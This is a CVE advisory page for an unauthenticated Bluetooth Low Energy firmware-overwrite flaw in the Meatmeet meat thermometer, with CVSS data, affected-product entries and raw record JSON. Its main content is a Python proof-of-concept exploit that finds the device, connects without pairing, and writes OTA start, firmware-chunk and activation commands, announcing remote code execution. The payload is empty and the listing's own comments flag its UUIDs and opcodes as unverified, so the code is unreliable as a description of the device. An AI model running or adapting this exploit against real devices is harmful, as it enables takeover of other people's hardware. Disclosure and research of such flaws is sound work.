Security Vulnerability Report
CVE-2025-65824 CVSS 8.8 HIGH

CVE-2025-65824

Published: 2025-12-10 21:16:08
Last Modified: 2026-01-21 19:06:23

Description

An unauthenticated attacker within proximity of the Meatmeet device can perform an unauthorized Over The Air (OTA) firmware upgrade using Bluetooth Low Energy (BLE), resulting in the firmware on the device being overwritten with the attacker's code. As the device does not perform checks on upgrades, this results in Remote Code Execution (RCE) and the victim losing complete access to the Meatmeet.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:* - NOT VULNERABLE
Meatmeet: all versions (note that the CPE entries above name only firmware 1.0.34.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-65824 proof of concept: unauthenticated BLE OTA firmware write on Meatmeet.
#
# The listing walks through the sequence the advisory describes: a BLE central
# connects without pairing or credentials, writes to the OTA control and data
# characteristics, and asks the device to switch to the transferred image.
# The CVE record classifies this as CWE-306 (missing authentication for a
# critical function) and states that the device performs no checks on upgrades.
#
# NOTE(review): the service/characteristic UUIDs and the control opcodes below
# are not stated in the CVE record on this page; treat them as unverified until
# checked against the referenced advisory.
# NOTE(review): from the defender's side, the fix belongs in the firmware: the
# OTA characteristics should reject writes from unauthenticated/unbonded peers,
# and the image should be verified before it is activated.
import asyncio
from bleak import BleakClient, BleakScanner
import struct  # not used anywhere in this listing
import hashlib  # not used anywhere in this listing

# Substring matched against the advertised device name during the scan.
TARGET_DEVICE_NAME = "Meatmeet"

# GATT identifiers the listing uses for the OTA service and its characteristics.
OTA_SERVICE_UUID = "0000fe00-0000-1000-8000-00805f9b34fb"
OTA_CONTROL_UUID = "0000fe01-0000-1000-8000-00805f9b34fb"
OTA_DATA_UUID = "0000fe02-0000-1000-8000-00805f9b34fb"

# Image to transfer. Empty on this page, so no data chunks are written.
MALICIOUS_FIRMWARE = b""


class MeatmeetOTAExploit:
    """Drive the unauthenticated OTA sequence against one discovered device.

    State is limited to the scan result (``target_device``) and the BLE
    client (``client``); both start as ``None``.
    """

    def __init__(self):
        self.target_device = None
        self.client = None

    def _ota_characteristic(self, char_uuid):
        """Look up a characteristic of the OTA service on the connected client."""
        service = self.client.services.get_service(OTA_SERVICE_UUID)
        return service.get_characteristic(char_uuid)

    async def discover_device(self):
        """Scan for BLE devices and remember the first whose name matches.

        Returns:
            True when a device whose name contains ``TARGET_DEVICE_NAME`` was
            found (it is stored in ``self.target_device``), otherwise False.
        """
        found = await BleakScanner.discover()
        # Devices may advertise no name at all; treat that as an empty string.
        match = next(
            (dev for dev in found if TARGET_DEVICE_NAME in (dev.name or "")),
            None,
        )
        if match is None:
            return False
        self.target_device = match
        print(f"[+] Found target: {match.name} ({match.address})")
        return True

    async def connect(self):
        """Open a BLE connection to the discovered device.

        No pairing or authentication step is performed here; that the
        device accepts the session anyway is the condition the CVE reports.

        Raises:
            Exception: if ``discover_device`` has not stored a target yet.
        """
        target = self.target_device
        if not target:
            raise Exception("Target device not found")
        self.client = BleakClient(target.address)
        await self.client.connect()
        print(f"[+] Connected to {target.name}")

    async def initiate_ota_update(self):
        """Write the OTA start command to the control characteristic."""
        control = self._ota_characteristic(OTA_CONTROL_UUID)
        # Start opcode as given in the listing (marked device-specific there).
        start_command = b"\x01\x00\x00\x00"
        await self.client.write_gatt_char(control, start_command)
        print("[+] Sent OTA initiation command")
        await asyncio.sleep(0.5)

    async def send_malicious_firmware(self):
        """Transfer ``MALICIOUS_FIRMWARE`` to the data characteristic in chunks."""
        data_char = self._ota_characteristic(OTA_DATA_UUID)
        image = MALICIOUS_FIRMWARE
        chunk_size = 240
        offsets = range(0, len(image), chunk_size)
        for number, start in enumerate(offsets, start=1):
            await self.client.write_gatt_char(
                data_char, image[start:start + chunk_size]
            )
            print(f"[+] Sent firmware chunk {number}")
            # Short pause between consecutive writes.
            await asyncio.sleep(0.01)
        print(f"[+] Sent {len(image)} bytes of malicious firmware")

    async def activate_firmware(self):
        """Write the activate command to the control characteristic."""
        control = self._ota_characteristic(OTA_CONTROL_UUID)
        activate_command = b"\x03\x00\x00\x00"
        await self.client.write_gatt_char(control, activate_command)
        print("[+] Sent firmware activation command")
        await asyncio.sleep(2)

    async def exploit(self):
        """Run discovery, connection, transfer and activation in order.

        Returns:
            True when every stage completed, False when no device was found
            or any stage raised. The client, if one was created, is
            disconnected in every case.
        """
        stages = (
            self.connect,
            self.initiate_ota_update,
            self.send_malicious_firmware,
            self.activate_firmware,
        )
        try:
            located = await self.discover_device()
            if located:
                for stage in stages:
                    await stage()
                print("[+] Exploitation complete - RCE achieved")
                return True
            print("[-] Target device not found")
            return False
        except Exception as e:
            print(f"[-] Exploitation failed: {e}")
            return False
        finally:
            if self.client:
                await self.client.disconnect()


async def main():
    """Create the driver object and run the full sequence once."""
    await MeatmeetOTAExploit().exploit()


if __name__ == "__main__":
    asyncio.run(main())

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65824", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:08.137", "lastModified": "2026-01-21T19:06:23.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unauthenticated attacker within proximity of the Meatmeet device can perform an unauthorized Over The Air (OTA) firmware upgrade using Bluetooth Low Energy (BLE), resulting in the firmware on the device being overwritten with the attacker's code. As the device does not perform checks on upgrades, this results in Remote Code Execution (RCE) and the victim losing complete access to the Meatmeet."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer_firmware:1.0.34.4:*:*:*:*:*:*:*", "matchCriteriaId": "9B669DA2-CF06-461F-B624-DCD0359D1656"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:meatmeet:meatmeet_pro_wifi_\\&_bluetooth_meat_thermometer:-:*:*:*:*:*:*:*", "matchCriteriaId": "1661B540-36E1-4BF0-BC63-9EC952560B54"}]}]}], "references": [{"url": "https://gist.github.com/dead1nfluence/4dffc239b4a460f41a03345fd8e5feb5#file-remote-code-execution-md", "source": "[email protected]", 
"tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://github.com/dead1nfluence/Meatmeet-Pro-Vulnerabilities/blob/main/Device/Remote-Code-Execution.md", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}]}}